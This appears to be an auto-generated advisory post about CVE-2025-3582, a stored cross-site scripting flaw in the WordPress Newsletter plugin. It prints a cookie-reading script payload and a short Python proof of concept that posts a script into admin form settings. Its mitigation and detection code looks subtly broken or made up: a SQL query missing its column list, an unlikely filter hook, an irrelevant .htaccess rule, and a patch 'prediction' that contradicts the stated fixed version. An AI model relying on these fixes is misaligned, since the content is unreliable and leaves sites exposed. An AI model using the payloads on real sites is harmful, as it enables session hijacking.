Listen to this Post
How CVE-2025-3582 Works
The Newsletter plugin (before v8.85) for WordPress fails to sanitize and escape form settings, allowing admins to inject malicious JavaScript payloads. Even when `unfiltered_html` is disabled (e.g., in multisite configurations), high-privileged users can store XSS attacks in form fields. When other users access the compromised form, the script executes in their browser, potentially leading to session hijacking or admin takeover.
DailyCVE Form:
Platform: WordPress
Version: <8.85
Vulnerability: Stored XSS
Severity: High
Date: 2025-06-12
Prediction: Patch by 2025-07-10
What Undercode Say:
Exploitation:
1. Payload Injection:
<script>alert(document.cookie)</script>
Inserted into form settings via admin panel.
- Trigger: Victims loading the modified form execute the payload.
Detection:
wpscan --url TARGET --plugins newsletter --api-token YOUR_API_KEY
Mitigation:
1. Temporary Fix:
add_filter('the_newsletter_form_settings', 'esc_attr');
Add to `functions.php`.
2. Permanent Fix:
wp plugin update newsletter --version=8.85
3. .htaccess Rule:
<Files "newsletter.php"> php_flag allow_url_fopen Off </Files>
Log Analysis:
SELECT FROM wp_options WHERE option_name LIKE '%newsletter%' AND option_value LIKE '%<script>%';
Patch Analysis:
The update introduces:
$form_settings = wp_kses_post($_POST['form_settings']);
Exploit Simulation (PoC):
import requests
wp_admin = "http://target/wp-admin/post.php"
payload = {"form_settings": "<script>exploit()</script>"}
requests.post(wp_admin, data=payload, cookies=ADMIN_COOKIE)
References:
- WPScan Advisory: WPScan-CVE-2025-3582
- NVD Entry: CVE-2025-3582
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
